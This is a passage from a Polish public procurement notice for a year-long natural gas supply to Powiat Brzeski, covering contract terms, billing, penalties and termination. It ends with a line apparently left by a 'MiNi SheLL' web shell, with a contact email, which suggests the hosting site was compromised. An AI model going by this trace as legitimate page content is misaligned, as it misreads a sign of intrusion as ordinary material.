aktach wykonawczych do tej ustawy.16)	Wykonawca zobowiązuje się zapewnić Zamawiającemu standardy jakości obsługi Zamawiającego w zakresie świadczenia usług dystrybucji:a)	nieodpłatnego udzielania informacji w sprawie rozliczeń oraz aktualnych taryf i zmian przepisów prawa powszechnie obowiązującego w zakresie objętym umową;b)	rozpatrywania wniosków lub reklamacji Zamawiającego w sprawie rozliczeń i udzielania odpowiedzi, nie później niż w terminie 14 dni od dnia złożenia wniosku lub zgłoszenia reklamacji;17)	Zamawiają zobowiązuje się, że będzie nabywał i odbierał od Sprzedawcy paliwo gazowe na cele określone w „Oświadczeniu Odbiorcy o przeznaczeniu Paliwa Gazowego na potrzeby naliczania podatku akcyzowego”, które będzie stanowiło Załącznik do Umowy. 18)	Wykonawca zobowiązuje się do reprezentowania Zamawiającego przed OSD w procesie zmiany sprzedawcy.19)	Czynności opisane w ppkt 18 Wykonawca podejmie bez zbędnej zwłoki, w sposób umożliwiający rozpoczęcie dostaw w terminie określnym w pkt 2 ppkt 1. 20)	Zamawiający przekaże Wykonawcy dane niezbędne do skutecznego przeprowadzenia procedury zmiany sprzedawcy Paliwa gazowego oraz udzieli Wykonawcy pisemnego pełnomocnictwa do jej przeprowadzenia, zgodnie ze wzorem stanowiącym Załącznik nr 6a do SIWZ - do Umowy. 21)	Wykonawca ponosi całkowitą odpowiedzialność za błędy wynikłe podczas procedury i pokryje wszelkie koszty wynikłe z tego tytułu, pod warunkiem, że błędy te nie będą spowodowane przekazaniem błędnych danych przez Zamawiającego.2.	Termin realizacji zamówienia 1)	Wymagany termin realizacji przedmiotu zamówienia: od 01.03.2020 r. do 28.02.2021 r. 2)	Wykonawca zapewni kompleksową dostawę zamówionego gazu ziemnego przez cały czas obowiązywania Umowy kompleksowej, począwszy od dnia wskazanego w zgłoszeniu zmiany sprzedawcy, w sposób ciągły i niezakłócony do wszystkich punktów poboru wskazanych przez Zamawiającego jednocześnie z zastrzeżeniem zapisów Rozporządzenia Ministra Gospodarki z dnia 2 lipca 2010 w sprawie szczegółowych warunków funkcjonowania systemu gazowego Dz. U. 2018 poz. 1158 z późn.zm.”3)	Świadczenie usługi kompleksowej nastąpi nie wcześniej niż z dniem rozpoczęcia świadczenia usługi dystrybucji przez OSD w ramach danej umowy.4)	Z przyczyn formalno-prawnych, Zamawiający dopuszcza zmianę terminu rozpoczęcia wykonania zamówienia z zastrzeżeniem granicznego terminu wykonania zamówienia do 28.02.2021 r., jednak nie wcześniej niż po skutecznym rozwiązaniu umowy, na podstawie której dotychczas Zamawiający miał dostarczane paliwo gazowe oraz skutecznym przeprowadzeniu procesu zmiany sprzedawcy u Operatora Systemu Dystrybucyjnego. 3.	Rozliczenia 1)	Ustalenie wynagrodzenia Wykonawcy z tytułu sprzedaży i dystrybucji paliwa gazowego dokonywane będzie odpowiednio według cen i stawek opłat oraz zasad rozliczeń określonych odpowiednio:a)	z tytułu sprzedaży paliwa gazowego – zgodnie z Formularzem cenowym tj. Załącznikiem nr 3 do SIWZb)	z tytułu świadczenia usług dystrybucji paliwa gazowego – zgodnie z aktualnie obowiązującą taryfą Operatora Sieci Dystrybucyjnej lub Operatora Sieci Przesyłowej, do którego sieci jest przyłączony Odbiorca.2)	Rozliczenia za Paliwo gazowe dokonywane będą w oparciu o faktury VAT wystawiane na podstawie danych pomiarowo–rozliczeniowych przekazanych Wykonawcy przez OSD,a)	z tytułu sprzedaży Paliwa gazowego zgodnie z ofertą złożoną w postępowaniu przetargowym, tj.:cena jednostkowa za gaz bez akcyzy (gr/kWh) – ……………….. cena jednostkowa za gaz z akcyzą 1,28 zł/GJ (gr/kWh) – ……………. abonament (zł/m-c) – …………………b)	z tytułu świadczenia usług dystrybucji Paliwa gazowego zgodnie z aktualną Taryfą OSD. 3)	Obowiązującą formą wynagrodzenia będzie wynagrodzenie umowne w którego skład wchodzi: - opłata za gaz, obliczana jako iloczyn ceny gazu (gr/kWh) i ilości paliwa gazowego (kWh) pobranego przez odbiorcę - opłata stała za usługę sieciową, obliczana jako:a) iloczyn stawki stałej (zł/m-c) i liczby miesięcy w okresie rozliczeniowym, dla grup taryfowych z oznaczeniami W-1, W-2, W-3, W-4b) iloczyn stawki stałej (gr/kWh/h za h), mocy umownej i liczby godzin w okresie rozliczeniowym, dla grup taryfowych z oznaczeniami W-5- opłata zmienna za usługę sieciową obliczana jest jako iloczyn stawki zmiennej (gr/kWh) i ilości paliwa gazowego (kWh) pobranego przez odbiorcę- opłata abonamentowa obliczana jako iloczyn miesięcznej stawki opłaty (zł/m-c) i liczby miesięcy w okresie rozliczeniowym zgodnie z treścią Formularza Cenowego stanowiącego element oferty.4)	Rozliczanie ilości dostarczonego Paliwa gazowego odbywać się będzie odrębnie dla każdego punktu poboru na podstawie rzeczywistych wskazań Układu pomiarowego, z uwzględnieniem współczynnika konwersji wyliczonego zgodnie z zasadami określonymi w Taryfie Operatora Systemu Dystrybucyjnego (OSD) w okresach ustalonych w Taryfie OSD. 5)	Prawidłowo wystawiona faktura powinna zawierać następujące oznaczenia:Nabywca: Powiat Brzeski ul.Głowackiego 51, 32-800 Brzesko (z wyjątkiem Komendy Powiatowej Państwowej Straży Pożarnej w Brzesku i Powiatowego Urzędu Pracy w Brzesku)Odbiorca: Nazwa i adres jednostki którego punktu dotyczy rozliczenie.6)	Powiat Brzeski informuje, że zastosuje mechanizm podzielonej płatności (split payment) przy dokonywaniu płatności kwota należności wynikającej z niniejszej umowy, w przypadku otrzymania faktury z wykazaną kwotą podatku Vat.7)	Należności z tytułu wystawionych faktur rozliczeniowych będą regulowane przez jednostki wymienione w pkt 1 ppkt 11 Istotnych Postanowień Umowy w terminie 14 dni od ich otrzymania przelewem na konto Wykonawcy (numer konta zostanie podany na fakturze za kompleksową dostawę gazu). 8)	Za dzień uregulowania należności przyjmuje się datę wpływu należności na rachunek bankowy Sprzedawcy wskazany na fakturze. 9)	Zamawiający upoważnia Wykonawcę do wystawiania faktur VAT bez podpisu odbiorcy. 10)	Nie dopuszcza się wystawiania faktur – prognoz. 4. Kary umowne1)	W przypadku niedotrzymania standardów i pomiarów jakościowych dostarczanego paliwa gazowego Zamawiającemu przysługuje upust i bonifikata w wysokości i na warunkach określonych w obowiązującym rozporządzeniu w sprawie szczegółowych zasad kształtowania i kalkulacji taryf oraz rozliczeń w obrocie paliwami gazowym w tym w taryfie OSD zatwierdzonej przez Prezesa Urzędu Regulacji Energetyki.2)	W przypadku nieterminowej płatności za wykonanie przedmiotu umowy Wykonawca może żądać - od tej jednostki spośród wymienionych w pkt 1 ppkt 11, która opóźnia się z zapłatą - zapłaty ustawowych odsetek za każdy dzień zwłoki, naliczanych od wartości faktury wystawionej przez Wykonawcę. 3)	Wykonawca zapłaci Zamawiającemu karę umowną za wypowiedzenie, rozwiązanie lub odstąpienie od Umowy przez którąkolwiek ze stron z przyczyn, za które odpowiedzialność ponosi Wykonawca, w wysokości 10% wynagrodzenia umownego brutto za wykonanie przedmiotu Umowy.4)	Zamawiającemu przysługuje od Wykonawcy, niezależnie od prawa do naliczania kar umownych, odszkodowanie w związku z poniesionymi kosztami zakupu gazu na warunkach innych niż wynikające z niniejszej umowy na skutek odstąpienia przez którąkolwiek ze stron od umowy, jej wypowiedzenia lub rozwiązania z przyczyn leżących po stronie Wykonawcy bądź zaprzestania przez Wykonawcę na stałe lub czasowo dostaw gazu skutkiem czego dostawy będą realizowane przez sprzedawcę, o którym mowa w art. 5aa ust. 1 lub art. 5ab Prawa energetycznego lub innego wykonawcę. Odszkodowanie będzie równe różnicy w kosztach zakupu gazu od tzw. sprzedawcy rezerwowego lub innego wykonawcy, w stosunku do kosztów jakie powinny zostać poniesione na podstawie umowy z Wykonawcą. Dotyczy to wszystkich jednostek wskazanych w pkt 1 ppkt 11 i całego okresu sprzedaży gazu przez sprzedawcę rezerwowego lub przez innego Wykonawcę w czasie w jakim miała obowiązywać umowa zawarta z Wykonawcą. 5)	Wykonawca wyraża zgodę na potrącenie kar umownych z przysługującemu mu wynagrodzenia.6)	Kary umowne nie wyłączają prawa dochodzenia przez Zamawiającego odszkodowania przewyższającego wysokość zastrzeżonych kar umownych. 5. Dopuszczalność zmiany umowy1)	Zakazana jest istotna zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.2)	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy (w formie aneksu) w stosunku do treści oferty zgodnie z art. 144 ust. 1 ustawy Pzp w następujących przypadkach:•	zmiany w strukturze organizacyjnej Wykonawcy lub Zamawiającego dotyczące np. określonych w umowie nazw, adresów. Strony niezwłocznie poinformują się pisemnie o tych zmianach,•	zmiany osób reprezentujących strony, Strony niezwłocznie poinformują się pisemnie o tych zmianach,•	na wniosek Zamawiającego możliwe jest rozszerzenie dostawy gazu ziemnego w przypadku dodawania nowych punktów poboru przez jednostki wymienionej w Załączniku nr 1 do SIWZ. Dodawane punkty poboru powinny być rozliczane w grupach taryfowych, które zostały wycenione w Formularz cenowym,•	zmiany unormowań prawnych powszechnie obowiązujących np. w przypadku ustawowej zmiany stawki podatku VAT od gazu ziemnego. Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za dostawy, których w dniu zmiany stawki podatku VAT czy podatku akcyzowego jeszcze nie wykonano,•	zmiana ceny ofertowej w przypadku zmiany opłaty stałej za usługę sieciową i opłaty zmiennej za usługę sieciową w przypadku zmiany Taryfy Operatora Systemu Dystrybucyjnego zatwierdzonej przez Prezesa Urzędu Regulacji Energetyki, po uprzednim pisemnym zawiadomieniu Zamawiającego wraz z dołączeniem Taryfy cen i opłat, •	zmiany mocy umownej w przypadku gdy w czasie trwania umowy zwiększyłoby się lub zmniejszyło zapotrzebowanie na moc w związku ze zmianą charakteru obiektu lub jego modernizacji,•	ceny jednostkowe netto dla części zużycia objętej podatkiem akcyzowym będą podlegały zmianie tylko w przypadku ustawowej zmiany opodatkowania gazu ziemnego podatkiem akcyzowym. Wykonawca jest zobowiązany na piśmie poinformować Zamawiającego o zmianie podatku akcyzowego oraz o jego wysokości. Dla części zużycia zwolnionej z akcyzy ceny jednostkowe netto nie ulegną zmianie,•	z przyczyn formalno-prawnych, Zamawiający dopuszcza zmianę terminu rozpoczęcia wykonania zamówienia z zastrzeżeniem granicznego terminu wykonania zamówienia do 28.02.2021 r., jednak nie wcześniej niż po skutecznym rozwiązaniu umowy, na podstawie której dotychczas Zamawiający miał dostarczane paliwo gazowe oraz skutecznym przeprowadzeniu procesu zmiany sprzedawcy u Operatora Systemu Dystrybucyjnego,•	rezygnacji przez Zamawiającego z części przedmiotu umowy w związku z utratą prawa do budynków w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone o koszty dotyczące danego obiektu.3)	Zmiany dokonywane będą na pisemny wniosek Wykonawcy lub Zamawiającego zawierający uzasadnienie dla ich wprowadzenia.6. Rozwiązanie umowy 1)	Zamawiający może odstąpić od umowy w terminie 30 dni od dnia powzięcia wiadomości o przyczynie odstąpienia w przypadku opóźnienia się przez Wykonawcę z rozpoczęciem sprzedaży paliwa gazowego o 7 dni w stosunku do terminu wskazanego w pkt 1 ppkt 4.2)	Zamawiający może wypowiedzieć umowę z zachowaniem 7-dniowego okresu wypowiedzenia:a)	rażącego naruszenia przez Wykonawcę istotnych postanowień umowy lub istotnych postanowień IRIESD przez drugą stronę, pomimo uprzedniego wezwania jej do zaniechania naruszeń i usunięcia ich skutków w wyznaczonym terminie. Strona wypowiadająca Umowę kompleksową może wskazać późniejszy termin rozwiązania Umowy,b)	wygaśnięcia generalnej umowy dystrybucyjnej wiążącej Wykonawcę z OSD i nieprzedłożenia Zamawiającemu oświadczenia o posiadaniu aktualnej umowy ramowej z OSD, a także utraty koncesji na obrót paliwami gazowymi, bądź nieprzedłożenie aktualnej koncesji na obrót. 3) W razie utraty przez Zamawiającego tytułu prawnego do któregokolwiek z miejsc odbioru, do których dostarczane jest paliwo gazowe przez Wykonawcę, Zamawiający może rozwiązać niniejszą umowę w trybie natychmiastowym jedynie w części dotyczącej dostarczania i sprzedaży paliwa gazowego do miejsca odbioru, w odniesieniu do którego Zamawiający utracił tytuł prawny, zaś w pozostałym zakresie Umowa będzie nadal wiązać strony. Oświadczenie o rozwiązaniu umowy wymaga zachowania formy pisemnej pod rygorem nieważności.4) Rozwiązanie Umowy kompleksowej może nastąpić w każdym czasie za pisemnym porozumieniem Stron.5) W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić istotnemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.6)	Zamawiający może rozwiązać umowę, jeżeli zachodzi co najmniej jedna z następujących okoliczności:a)	zmiana umowy została dokonana z naruszeniem art. 144 ust. 1-1b, 1d i 1e ustawy Prawo zamówień publicznych;b)	wykonawca w chwili zawarcia umowy podlegał wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych;c)	Trybunał Sprawiedliwości Unii Europejskiej stwierdził, w ramach procedury przewidzianej w art. 258 Traktatu o Funkcjonowaniu Unii Europejskiej, że państwo polskie uchybiło zobowiązaniom, które ciążą na nim na mocy Traktatów, dyrektywy 2014/24/UE i dyrektywy 2014/25/UE, z uwagi na to, że zamawiający udzielił zamówienia z naruszeniem przepisów prawa Unii Europejskiej. W przypadku, o którym mowa wyżej, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.8. Postanowienia końcowe1)	Wszelkie oświadczenia woli oraz zawiadomienia składane przez Strony w związku z wykonywaniem niniejszej umowy wymagają dla swej skuteczności formy pisemnej. 2)	Wszelkie oświadczenia woli, zawiadomienia składane przez Strony w związku z realizacją niniejszej umowy powinny być pod rygorem bezskuteczności dokonywane na piśmie.3) Strony są obowiązane informować siebie nawzajem o każdej zmianie adresów. Oświadczenia woli oraz zawiadomienia wysyłane na ostatnio podany adres Strony uznawane będą za skuteczne i złożone tej Stronie. 4)	Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ust. 1 Ustawy Pzp zgodnie z postanowieniami zawartymi w części 5.5)	Ewentualne kwestie sporne, wynikłe w trakcie realizacji niniejszej umowy strony rozstrzygać będą w drodze negocjacji. 6)	W przypadku nie dojścia do porozumienia w sposób wskazany w ust 5, sprawy sporne wynikłe z niniejszej umowy będą rozstrzygane przez Sąd właściwy dla siedziby Zamawiającego.7)	W sprawach nie uregulowanych w umowie będą miały zastosowanie przepisy Kodeksu Cywilnego, Ustawy Prawo zamówień publicznych oraz ustawy Prawo energetyczne wraz z obowiązującymi aktami wykonawczymi.8)	Istotne postanowienia umowy stanowią integralną część Umowy o udzielenie zamówienia publicznego.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-01-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com